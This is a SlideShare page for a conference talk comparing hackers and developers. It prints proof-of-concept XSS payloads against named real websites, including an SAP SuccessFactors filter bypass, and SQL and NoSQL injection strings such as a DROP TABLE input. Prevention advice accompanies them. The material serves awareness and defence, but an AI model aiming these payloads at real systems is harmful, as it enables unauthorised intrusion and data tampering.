SlideShare a Scribd company logo

Hackers vs developers

Download as PPTX, PDF
Soumyasanto Sen
Soumyasanto Sen

Hackers and developers are compared in the document. Hackers are described as skillful with deep technical understanding but often unsocial and focused on breaking systems. Developers are portrayed as true professionals who work with people to build applications and believe they can change the world. The document then provides examples of how hacking can look simple, such as cross-site scripting attacks on websites. It offers suggestions for prevention including input sanitization and access control. Later it discusses hacking in Node.js and risks of SQL and NoSQL injection. Finally it addresses how hacking and development skills could be applied for social good or security testing.

Technology
1 of 36
Soumyasanto Sen, #sitWDF Hackers versus Developers The GAME is ON
Introduction Player 1 : Hackers Expert: Skillful, with detailed understanding of some area deeply, often scarily deeply. Unsocial: Don’t want to come out of the shell. Breaker: Hack Apps Cool: People think that they are cool and they think they are Awesome. Super Power: They believe that they can be "Masters of the Universe" #sitWDF Controller: Can use lot of Systems and Languages and get them talk to each other. Social: True and broad professionals, work with people and communicate well Builder: Create Apps Boring: There are other more important things in life than just coding. Super Power: They believe they can change this World. Player 2 : Developers VS
#sitWDF
#sitWDF #sitWDF
#sitWDF
Hacking looks ‘Simple’ #sitWDF XSS - Cross Site Scripting JavaScript's Built-In Function(s) decodeURI: decodes encoded URI http://t.home.news.cn/spIndex.action?ds=all&h=458&pageSize=20&temp=topicRoll&topic="xx xxxxxx'yyyyy</img Possibilities: • '-confirm(1)-' • '-confirm`1`-' http://t.home.news.cn/spIndex.action?ds=all&h=458&pageSize=20&temp=topicRoll&topic='-c onfirm(1)-‘ var topic = decodeURI('');confirm(1);(''); var topic = decodeURI('');confirm(1);//');
Hacking looks ‘Simple’ #sitWDF XSS - Cross Site Scripting
Hacking looks ‘Simple’ #sitWDF XSS - Cross Site Scripting JavaScript's Built-In Function(s) replace (JS String replace Method): returns a string after a pattern http://www.zaobao.com.sg/search/site/"xxxxxxxx'yyyyy</img Possibilities: http://www.zaobao.com.sg/search/site/"-confirm(1)-" http://www.zaobao.com.sg/search/site/");confirm(1);(" http://www.zaobao.com.sg/search/site/");confirm(1);// (does not work because // is filtered)
Hacking looks ‘Simple’ #sitWDF XSS - Cross Site Scripting
Easy Rules #sitWDF Preventions • XSS (Cross Site Scripting) Prevention Cheat Sheet from OWASP • HTML5 Security Clean Sheet • Secure Coding Practice Guidelines • Use Clean URL's: https://www.site.com/news.php?id=1337 is way more tempting than https://www.site.com/news/some-news-or-today • Sanitize Inputs: Must for XSS • Controlling Access Control: http://www.site.com/phpmyadmin gave us access to comple te database! No injection, nothing • Validation on Input. • Use White-Listing • Switch-Off Errors.
Easy Rules #sitWDF Remember “Successful hackers are not just good at hacking. What makes a great hacker successful is that they are excellent at understanding human nature.” ( Developers love their code, just like its their child. ) “Do not trust anything ever, specially when it comes to user input.” “Security is about layers. It has to be because no single layer can be guaranteed to actually be secure” Security is nothing but an ILLUSION.
#sitWDF #sitWDF
#sitWDF
Hacking looks ‘Simple’ Even for #sitWDF Breaking SuccessFactors's XSS Filter '-confirm(1)-' was enough to break SAP's SuccessFactors's XSS filter and were able to make hundreds of web applications vulnerable ... https://jobs.sap.com/talentcommunity/login/?returnurl="xxxxxxxx'yyyyy</img Possibilities: • </script><script>alert(1)</script> • '-confirm(1)-'
Hacking looks ‘Simple’ Even for #sitWDF Breaking SuccessFactors's XSS Filter https://jobs.sap.com/talentcommunity/login/?returnurl=</script><script>alert(1)</script> Next Vector: <img src=x onerror=alert(1)>
Hacking looks ‘Simple’ Even for #sitWDF Breaking SuccessFactors's XSS Filter Next Vector: <img src=x onerror=confirm(1)> Next Vector: <a href=javascript:confirm(1)>click</a>
Hacking looks ‘Simple’ Even for #sitWDF Breaking SuccessFactors's XSS Filter Next Vectors: • <p onmouseover=prompt(1)>IamParagraph</p> • <details ontoggle=confirm(1)> • <input type=search onsearch=confirm(1)>
Easy Filtering #sitWDF Context Based Filtering
Easy Filtering #sitWDF Context Based Filtering
Easy Filtering #sitWDF Context Based Filtering Protection against JavaScript execution via `url` e.g., img'ssrc and/or anchor's href attribute Impleme ntation of `urlContextCleaner()`
Easy Filtering #sitWDF External HTML Sanitizer https://developers.google.com/caja/ The Caja project includes a html-sanitizer Example: <script src="html-sanitizer-minified.js"></script> <script> function urlX(url) { if(/^https?:///.test(url)) { return url }} function idX(id) { return id } alert(html_sanitize('<b>hello</b><img src="http://asdf"><a href="javascript:alert(0)"> <script src="http://dfd"></script>', urlX, idX)) </script>
#sitWDF #sitWDF
#sitWDF Node.js is a JavaScript runtime built on Chrome's V8 JavaScript engine
Hacking in Node.js #sitWDF Off Course XSS Improper parsing of nested tags and Incomplete filtering of javascript: URIs <s <onmouseover="alert(1)"> <s onmouseover="alert(1)">This is a test</s> <a href="javascriptJ a V a S c R iPt::alert(1)" "<s>">test</a> (With any Encoding)
Hacking in Node.js #sitWDF Server Side JavaScript Injection Simple JS Command: response.end(“Ended Response”); [pid 25170] execve("/bin/sh", ["/bin/sh", "-c", "ls -l user input"],
Hacking in Node.js #sitWDF SQL and NoSQL Injection Classic SQL Injection Bypass SELECT * FROM users WHERE username = '$username' AND password = '$password‘ (SELECT * FROM users WHERE username = '' or 1=1--' AND password = '‘) select author from books where id=$id -> (select author from books where id=2 or 1=1) Statement stmt = conn.createStatement("INSERT INTO students VALUES('" + user + "')"); stmt.execute(); (Robert'); DROP TABLE students; --) db.users.find({username: username, password: password}); (NoSQL) { "username": {"$gt": ""}, "password": {"$gt": ""} }
Secure Node.js #sitWDF Protection XSS Prevention • Sanitize untrusted HTML http://jsxss.com/en/index.html https://github.com/theSmaw/Caja-HTML-Sanitizer https://www.owasp.org/index.php/Projects/OWASP_Node_js_Goat_Project SSJSI Prevention • Substitution of the eval() with the JSON.parse() function, the code is no longer injectable • Use child_process.execFile or child_process.spawn instead of child_process.exec
Secure Node.js #sitWDF Protection SQL and NoSQL Injection Prevention • Using Parameterize SQL var q = 'SELECT name FROM books WHERE id = $1'; client.query(q, ['3'], function(err, result) {}); • PreparedStatements avoid/prevent SQL Injection Statement stmt = conn.prepareStatement("INSERT INTO student VALUES(?)"); stmt.setString(1, user); stmt.execute(); (Use the $in Operator to Match Values) db.users.find({user: { $in: [user] }, pass: { $in: [pass] }}); (NoSQL)
#sitWDF
Positive Side • Social Good: find solution for social benefit, operations and emergencies • Penetration Testing: to find vulnerabilities that an attacker could exploit • open-source: much of this open-source code is produced, tested and improved by hackers, usually like hackathons #sitWDF Good Cause
Negative Side • Corruption of government officials (58.0%) • Cyber-terrorism (44.8%) • Corporate tracking of personal information (44.6%) • Terrorist attacks (44.4%) • Government tracking of personal information (41.4%) • Bio-warfare (40.9%) • Identity theft (39.6%) • Economic collapse (39.2%) • Running out of money in the future (37.4%) • Credit card fraud (36.9%) • Source: Chapman University #sitWDF Top 10 fears of 2015
Make Difference #sitWDF
Make Difference #sitWDF Source: Scott Hanselman
#sitWDF
Who is the Winner? A "Hacker" is a state of mind. A “Developer" is a state of function. #sitWDF Choice is Yours
#sitWDF Thank You Soumyasanto Sen @soumyasanto

Recommended

Applications secure by default
Applications secure by defaultApplications secure by default
Applications secure by defaultSecuRing
 
Looking for Vulnerable Code. Vlad Savitsky
Looking for Vulnerable Code. Vlad SavitskyLooking for Vulnerable Code. Vlad Savitsky
Looking for Vulnerable Code. Vlad SavitskyVlad Savitsky
 
Application Security around OWASP Top 10
Application Security around OWASP Top 10Application Security around OWASP Top 10
Application Security around OWASP Top 10Sastry Tumuluri
 
[1.2] Трюки при анализе защищенности веб приложений – продвинутая версия - С...
[1.2] Трюки при анализе защищенности веб приложений – продвинутая версия - С...[1.2] Трюки при анализе защищенности веб приложений – продвинутая версия - С...
[1.2] Трюки при анализе защищенности веб приложений – продвинутая версия - С...OWASP Russia
 
Secure Coding for NodeJS
Secure Coding for NodeJSSecure Coding for NodeJS
Secure Coding for NodeJSThang Chung
 
RSA Conference 2010 San Francisco
RSA Conference 2010 San FranciscoRSA Conference 2010 San Francisco
RSA Conference 2010 San FranciscoAditya K Sood
 
The State of Credential Stuffing and the Future of Account Takeovers.
The State of Credential Stuffing and the Future of Account Takeovers.The State of Credential Stuffing and the Future of Account Takeovers.
The State of Credential Stuffing and the Future of Account Takeovers.Jarrod Overson
 
AppSecCali - How Credential Stuffing is Evolving
AppSecCali - How Credential Stuffing is EvolvingAppSecCali - How Credential Stuffing is Evolving
AppSecCali - How Credential Stuffing is EvolvingJarrod Overson
 

Recommended

Applications secure by default
Applications secure by defaultApplications secure by default
Applications secure by defaultSecuRing
 
Looking for Vulnerable Code. Vlad Savitsky
Looking for Vulnerable Code. Vlad SavitskyLooking for Vulnerable Code. Vlad Savitsky
Looking for Vulnerable Code. Vlad SavitskyVlad Savitsky
 
Application Security around OWASP Top 10
Application Security around OWASP Top 10Application Security around OWASP Top 10
Application Security around OWASP Top 10Sastry Tumuluri
 
[1.2] Трюки при анализе защищенности веб приложений – продвинутая версия - С...
[1.2] Трюки при анализе защищенности веб приложений – продвинутая версия - С...[1.2] Трюки при анализе защищенности веб приложений – продвинутая версия - С...
[1.2] Трюки при анализе защищенности веб приложений – продвинутая версия - С...OWASP Russia
 
Secure Coding for NodeJS
Secure Coding for NodeJSSecure Coding for NodeJS
Secure Coding for NodeJSThang Chung
 
RSA Conference 2010 San Francisco
RSA Conference 2010 San FranciscoRSA Conference 2010 San Francisco
RSA Conference 2010 San FranciscoAditya K Sood
 
The State of Credential Stuffing and the Future of Account Takeovers.
The State of Credential Stuffing and the Future of Account Takeovers.The State of Credential Stuffing and the Future of Account Takeovers.
The State of Credential Stuffing and the Future of Account Takeovers.Jarrod Overson
 
AppSecCali - How Credential Stuffing is Evolving
AppSecCali - How Credential Stuffing is EvolvingAppSecCali - How Credential Stuffing is Evolving
AppSecCali - How Credential Stuffing is EvolvingJarrod Overson
 
PHP Secure Programming
PHP Secure ProgrammingPHP Secure Programming
PHP Secure ProgrammingBalavignesh Kasinathan
 
Security on Rails
Security on RailsSecurity on Rails
Security on RailsDavid Paluy
 
Web Security 101
Web Security 101Web Security 101
Web Security 101Michael Peters
 
Applications secure by default
Applications secure by defaultApplications secure by default
Applications secure by defaultSlawomir Jasek
 
W3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesW3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesBrad Hill
 
Drupal campleuven: Secure Drupal Development
Drupal campleuven: Secure Drupal DevelopmentDrupal campleuven: Secure Drupal Development
Drupal campleuven: Secure Drupal DevelopmentSteven Van den Hout
 
Drupal Security Seminar
Drupal Security SeminarDrupal Security Seminar
Drupal Security SeminarCalibrate
 
PHPUG Presentation
PHPUG PresentationPHPUG Presentation
PHPUG PresentationDamon Cortesi
 
Security of Web Applications: Top 6 Risks To Avoid
Security of Web Applications: Top 6 Risks To AvoidSecurity of Web Applications: Top 6 Risks To Avoid
Security of Web Applications: Top 6 Risks To Avoidslicklash
 
Anatomy of a WordPress Hack
Anatomy of a WordPress HackAnatomy of a WordPress Hack
Anatomy of a WordPress Hackjessepollak
 
Not so blind SQL Injection
Not so blind SQL InjectionNot so blind SQL Injection
Not so blind SQL InjectionFrancisco Ribeiro
 
The Ultimate IDS Smackdown
The Ultimate IDS SmackdownThe Ultimate IDS Smackdown
The Ultimate IDS SmackdownMario Heiderich
 
jQuery presentation
jQuery presentationjQuery presentation
jQuery presentationMahesh Reddy
 
DevBeat 2013 - Developer-first Security
DevBeat 2013 - Developer-first SecurityDevBeat 2013 - Developer-first Security
DevBeat 2013 - Developer-first SecurityCoverity
 
The Future of Web Attacks - CONFidence 2010
The Future of Web Attacks - CONFidence 2010The Future of Web Attacks - CONFidence 2010
The Future of Web Attacks - CONFidence 2010Mario Heiderich
 
Something Died Inside Your Git Repo
Something Died Inside Your Git RepoSomething Died Inside Your Git Repo
Something Died Inside Your Git RepoCliff Smith
 
Crash Course In Brain Surgery
Crash Course In Brain SurgeryCrash Course In Brain Surgery
Crash Course In Brain Surgerymorisson
 
Drupal Security
Drupal SecurityDrupal Security
Drupal SecurityRan Bar-Zik
 
Interpolique
InterpoliqueInterpolique
InterpoliqueDan Kaminsky
 
Interpolique
InterpoliqueInterpolique
InterpoliqueDan Kaminsky
 
The State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxThe State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxLoriGlavin3
 
(How to Program) Paul Deitel, Harvey Deitel-Java How to Program, Early Object...
(How to Program) Paul Deitel, Harvey Deitel-Java How to Program, Early Object...(How to Program) Paul Deitel, Harvey Deitel-Java How to Program, Early Object...
(How to Program) Paul Deitel, Harvey Deitel-Java How to Program, Early Object...AliaaTarek5
 

More Related Content

Similar to Hackers vs developers

Security on Rails
Security on RailsSecurity on Rails
Security on RailsDavid Paluy
 
Applications secure by default
Applications secure by defaultApplications secure by default
Applications secure by defaultSlawomir Jasek
 
W3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesW3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesBrad Hill
 
Drupal campleuven: Secure Drupal Development
Drupal campleuven: Secure Drupal DevelopmentDrupal campleuven: Secure Drupal Development
Drupal campleuven: Secure Drupal DevelopmentSteven Van den Hout
 
Drupal Security Seminar
Drupal Security SeminarDrupal Security Seminar
Drupal Security SeminarCalibrate
 
Security of Web Applications: Top 6 Risks To Avoid
Security of Web Applications: Top 6 Risks To AvoidSecurity of Web Applications: Top 6 Risks To Avoid
Security of Web Applications: Top 6 Risks To Avoidslicklash
 
Anatomy of a WordPress Hack
Anatomy of a WordPress HackAnatomy of a WordPress Hack
Anatomy of a WordPress Hackjessepollak
 
The Ultimate IDS Smackdown
The Ultimate IDS SmackdownThe Ultimate IDS Smackdown
The Ultimate IDS SmackdownMario Heiderich
 
jQuery presentation
jQuery presentationjQuery presentation
jQuery presentationMahesh Reddy
 
DevBeat 2013 - Developer-first Security
DevBeat 2013 - Developer-first SecurityDevBeat 2013 - Developer-first Security
DevBeat 2013 - Developer-first SecurityCoverity
 
The Future of Web Attacks - CONFidence 2010
The Future of Web Attacks - CONFidence 2010The Future of Web Attacks - CONFidence 2010
The Future of Web Attacks - CONFidence 2010Mario Heiderich
 
Something Died Inside Your Git Repo
Something Died Inside Your Git RepoSomething Died Inside Your Git Repo
Something Died Inside Your Git RepoCliff Smith
 
Crash Course In Brain Surgery
Crash Course In Brain SurgeryCrash Course In Brain Surgery
Crash Course In Brain Surgerymorisson
 

Similar to Hackers vs developers (20)

PHP Secure Programming
PHP Secure ProgrammingPHP Secure Programming
PHP Secure Programming
 
Security on Rails
Security on RailsSecurity on Rails
Security on Rails
 
Web Security 101
Web Security 101Web Security 101
Web Security 101
 
Applications secure by default
Applications secure by defaultApplications secure by default
Applications secure by default
 
W3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesW3 conf hill-html5-security-realities
W3 conf hill-html5-security-realities
 
Drupal campleuven: Secure Drupal Development
Drupal campleuven: Secure Drupal DevelopmentDrupal campleuven: Secure Drupal Development
Drupal campleuven: Secure Drupal Development
 
Drupal Security Seminar
Drupal Security SeminarDrupal Security Seminar
Drupal Security Seminar
 
PHPUG Presentation
PHPUG PresentationPHPUG Presentation
PHPUG Presentation
 
Security of Web Applications: Top 6 Risks To Avoid
Security of Web Applications: Top 6 Risks To AvoidSecurity of Web Applications: Top 6 Risks To Avoid
Security of Web Applications: Top 6 Risks To Avoid
 
Anatomy of a WordPress Hack
Anatomy of a WordPress HackAnatomy of a WordPress Hack
Anatomy of a WordPress Hack
 
Not so blind SQL Injection
Not so blind SQL InjectionNot so blind SQL Injection
Not so blind SQL Injection
 
The Ultimate IDS Smackdown
The Ultimate IDS SmackdownThe Ultimate IDS Smackdown
The Ultimate IDS Smackdown
 
jQuery presentation
jQuery presentationjQuery presentation
jQuery presentation
 
DevBeat 2013 - Developer-first Security
DevBeat 2013 - Developer-first SecurityDevBeat 2013 - Developer-first Security
DevBeat 2013 - Developer-first Security
 
The Future of Web Attacks - CONFidence 2010
The Future of Web Attacks - CONFidence 2010The Future of Web Attacks - CONFidence 2010
The Future of Web Attacks - CONFidence 2010
 
Something Died Inside Your Git Repo
Something Died Inside Your Git RepoSomething Died Inside Your Git Repo
Something Died Inside Your Git Repo
 
Crash Course In Brain Surgery
Crash Course In Brain SurgeryCrash Course In Brain Surgery
Crash Course In Brain Surgery
 
Drupal Security
Drupal SecurityDrupal Security
Drupal Security
 
Interpolique
InterpoliqueInterpolique
Interpolique
 
Interpolique
InterpoliqueInterpolique
Interpolique
 

Recently uploaded

The State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxThe State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxLoriGlavin3
 
(How to Program) Paul Deitel, Harvey Deitel-Java How to Program, Early Object...
(How to Program) Paul Deitel, Harvey Deitel-Java How to Program, Early Object...(How to Program) Paul Deitel, Harvey Deitel-Java How to Program, Early Object...
(How to Program) Paul Deitel, Harvey Deitel-Java How to Program, Early Object...AliaaTarek5
 
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024BookNet Canada
 
Time Series Foundation Models - current state and future directions
Time Series Foundation Models - current state and future directionsTime Series Foundation Models - current state and future directions
Time Series Foundation Models - current state and future directionsNathaniel Shimoni
 
Enhancing User Experience - Exploring the Latest Features of Tallyman Axis Lo...
Enhancing User Experience - Exploring the Latest Features of Tallyman Axis Lo...Enhancing User Experience - Exploring the Latest Features of Tallyman Axis Lo...
Enhancing User Experience - Exploring the Latest Features of Tallyman Axis Lo...Scott Andery
 
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptxPasskey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptxLoriGlavin3
 
A Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software DevelopersA Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software DevelopersNicole Novielli
 
Rise of the Machines: Known As Drones...
Rise of the Machines: Known As Drones...Rise of the Machines: Known As Drones...
Rise of the Machines: Known As Drones...Rick Flair
 
2024 April Patch Tuesday
2024 April Patch Tuesday2024 April Patch Tuesday
2024 April Patch TuesdayIvanti
 
Scale your database traffic with Read & Write split using MySQL Router
Scale your database traffic with Read & Write split using MySQL RouterScale your database traffic with Read & Write split using MySQL Router
Scale your database traffic with Read & Write split using MySQL RouterMydbops
 
TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024Lonnie McRorey
 
Take control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteTake control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteDianaGray10
 
Long journey of Ruby standard library at RubyConf AU 2024
Long journey of Ruby standard library at RubyConf AU 2024Long journey of Ruby standard library at RubyConf AU 2024
Long journey of Ruby standard library at RubyConf AU 2024Hiroshi SHIBATA
 
Potential of AI (Generative AI) in Business: Learnings and Insights
Potential of AI (Generative AI) in Business: Learnings and InsightsPotential of AI (Generative AI) in Business: Learnings and Insights
Potential of AI (Generative AI) in Business: Learnings and InsightsRavi Sanghani
 
Assure Ecommerce and Retail Operations Uptime with ThousandEyes
Assure Ecommerce and Retail Operations Uptime with ThousandEyesAssure Ecommerce and Retail Operations Uptime with ThousandEyes
Assure Ecommerce and Retail Operations Uptime with ThousandEyesThousandEyes
 
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024BookNet Canada
 
How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.Curtis Poe
 
The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...
The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...
The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...Wes McKinney
 
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxMerck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxLoriGlavin3
 
DevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsDevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsSergiu Bodiu
 

Recently uploaded (20)

The State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxThe State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptx
 
(How to Program) Paul Deitel, Harvey Deitel-Java How to Program, Early Object...
(How to Program) Paul Deitel, Harvey Deitel-Java How to Program, Early Object...(How to Program) Paul Deitel, Harvey Deitel-Java How to Program, Early Object...
(How to Program) Paul Deitel, Harvey Deitel-Java How to Program, Early Object...
 
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
 
Time Series Foundation Models - current state and future directions
Time Series Foundation Models - current state and future directionsTime Series Foundation Models - current state and future directions
Time Series Foundation Models - current state and future directions
 
Enhancing User Experience - Exploring the Latest Features of Tallyman Axis Lo...
Enhancing User Experience - Exploring the Latest Features of Tallyman Axis Lo...Enhancing User Experience - Exploring the Latest Features of Tallyman Axis Lo...
Enhancing User Experience - Exploring the Latest Features of Tallyman Axis Lo...
 
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptxPasskey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptx
 
A Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software DevelopersA Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software Developers
 
Rise of the Machines: Known As Drones...
Rise of the Machines: Known As Drones...Rise of the Machines: Known As Drones...
Rise of the Machines: Known As Drones...
 
2024 April Patch Tuesday
2024 April Patch Tuesday2024 April Patch Tuesday
2024 April Patch Tuesday
 
Scale your database traffic with Read & Write split using MySQL Router
Scale your database traffic with Read & Write split using MySQL RouterScale your database traffic with Read & Write split using MySQL Router
Scale your database traffic with Read & Write split using MySQL Router
 
TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024
 
Take control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteTake control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test Suite
 
Long journey of Ruby standard library at RubyConf AU 2024
Long journey of Ruby standard library at RubyConf AU 2024Long journey of Ruby standard library at RubyConf AU 2024
Long journey of Ruby standard library at RubyConf AU 2024
 
Potential of AI (Generative AI) in Business: Learnings and Insights
Potential of AI (Generative AI) in Business: Learnings and InsightsPotential of AI (Generative AI) in Business: Learnings and Insights
Potential of AI (Generative AI) in Business: Learnings and Insights
 
Assure Ecommerce and Retail Operations Uptime with ThousandEyes
Assure Ecommerce and Retail Operations Uptime with ThousandEyesAssure Ecommerce and Retail Operations Uptime with ThousandEyes
Assure Ecommerce and Retail Operations Uptime with ThousandEyes
 
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
 
How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.
 
The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...
The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...
The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...
 
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxMerck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
 
DevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsDevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platforms
 

Hackers vs developers

  • 1. Soumyasanto Sen, #sitWDF Hackers versus Developers The GAME is ON
  • 2. Introduction Player 1 : Hackers Expert: Skillful, with detailed understanding of some area deeply, often scarily deeply. Unsocial: Don’t want to come out of the shell. Breaker: Hack Apps Cool: People think that they are cool and they think they are Awesome. Super Power: They believe that they can be "Masters of the Universe" #sitWDF Controller: Can use lot of Systems and Languages and get them talk to each other. Social: True and broad professionals, work with people and communicate well Builder: Create Apps Boring: There are other more important things in life than just coding. Super Power: They believe they can change this World. Player 2 : Developers VS
  • 6. Hacking looks ‘Simple’ #sitWDF XSS - Cross Site Scripting JavaScript's Built-In Function(s) decodeURI: decodes encoded URI http://t.home.news.cn/spIndex.action?ds=all&h=458&pageSize=20&temp=topicRoll&topic="xx xxxxxx'yyyyy</img Possibilities: • '-confirm(1)-' • '-confirm`1`-' http://t.home.news.cn/spIndex.action?ds=all&h=458&pageSize=20&temp=topicRoll&topic='-c onfirm(1)-‘ var topic = decodeURI('');confirm(1);(''); var topic = decodeURI('');confirm(1);//');
  • 7. Hacking looks ‘Simple’ #sitWDF XSS - Cross Site Scripting
  • 8. Hacking looks ‘Simple’ #sitWDF XSS - Cross Site Scripting JavaScript's Built-In Function(s) replace (JS String replace Method): returns a string after a pattern http://www.zaobao.com.sg/search/site/"xxxxxxxx'yyyyy</img Possibilities: http://www.zaobao.com.sg/search/site/"-confirm(1)-" http://www.zaobao.com.sg/search/site/");confirm(1);(" http://www.zaobao.com.sg/search/site/");confirm(1);// (does not work because // is filtered)
  • 9. Hacking looks ‘Simple’ #sitWDF XSS - Cross Site Scripting
  • 10. Easy Rules #sitWDF Preventions • XSS (Cross Site Scripting) Prevention Cheat Sheet from OWASP • HTML5 Security Clean Sheet • Secure Coding Practice Guidelines • Use Clean URL's: https://www.site.com/news.php?id=1337 is way more tempting than https://www.site.com/news/some-news-or-today • Sanitize Inputs: Must for XSS • Controlling Access Control: http://www.site.com/phpmyadmin gave us access to comple te database! No injection, nothing • Validation on Input. • Use White-Listing • Switch-Off Errors.
  • 11. Easy Rules #sitWDF Remember “Successful hackers are not just good at hacking. What makes a great hacker successful is that they are excellent at understanding human nature.” ( Developers love their code, just like its their child. ) “Do not trust anything ever, specially when it comes to user input.” “Security is about layers. It has to be because no single layer can be guaranteed to actually be secure” Security is nothing but an ILLUSION.
  • 14. Hacking looks ‘Simple’ Even for #sitWDF Breaking SuccessFactors's XSS Filter '-confirm(1)-' was enough to break SAP's SuccessFactors's XSS filter and were able to make hundreds of web applications vulnerable ... https://jobs.sap.com/talentcommunity/login/?returnurl="xxxxxxxx'yyyyy</img Possibilities: • </script><script>alert(1)</script> • '-confirm(1)-'
  • 15. Hacking looks ‘Simple’ Even for #sitWDF Breaking SuccessFactors's XSS Filter https://jobs.sap.com/talentcommunity/login/?returnurl=</script><script>alert(1)</script> Next Vector: <img src=x onerror=alert(1)>
  • 16. Hacking looks ‘Simple’ Even for #sitWDF Breaking SuccessFactors's XSS Filter Next Vector: <img src=x onerror=confirm(1)> Next Vector: <a href=javascript:confirm(1)>click</a>
  • 17. Hacking looks ‘Simple’ Even for #sitWDF Breaking SuccessFactors's XSS Filter Next Vectors: • <p onmouseover=prompt(1)>IamParagraph</p> • <details ontoggle=confirm(1)> • <input type=search onsearch=confirm(1)>
  • 20. Easy Filtering #sitWDF Context Based Filtering Protection against JavaScript execution via `url` e.g., img'ssrc and/or anchor's href attribute Impleme ntation of `urlContextCleaner()`
  • 21. Easy Filtering #sitWDF External HTML Sanitizer https://developers.google.com/caja/ The Caja project includes a html-sanitizer Example: <script src="html-sanitizer-minified.js"></script> <script> function urlX(url) { if(/^https?:///.test(url)) { return url }} function idX(id) { return id } alert(html_sanitize('<b>hello</b><img src="http://asdf"><a href="javascript:alert(0)"> <script src="http://dfd"></script>', urlX, idX)) </script>
  • 23. #sitWDF Node.js is a JavaScript runtime built on Chrome's V8 JavaScript engine
  • 24. Hacking in Node.js #sitWDF Off Course XSS Improper parsing of nested tags and Incomplete filtering of javascript: URIs <s <onmouseover="alert(1)"> <s onmouseover="alert(1)">This is a test</s> <a href="javascriptJ a V a S c R iPt::alert(1)" "<s>">test</a> (With any Encoding)
  • 25. Hacking in Node.js #sitWDF Server Side JavaScript Injection Simple JS Command: response.end(“Ended Response”); [pid 25170] execve("/bin/sh", ["/bin/sh", "-c", "ls -l user input"],
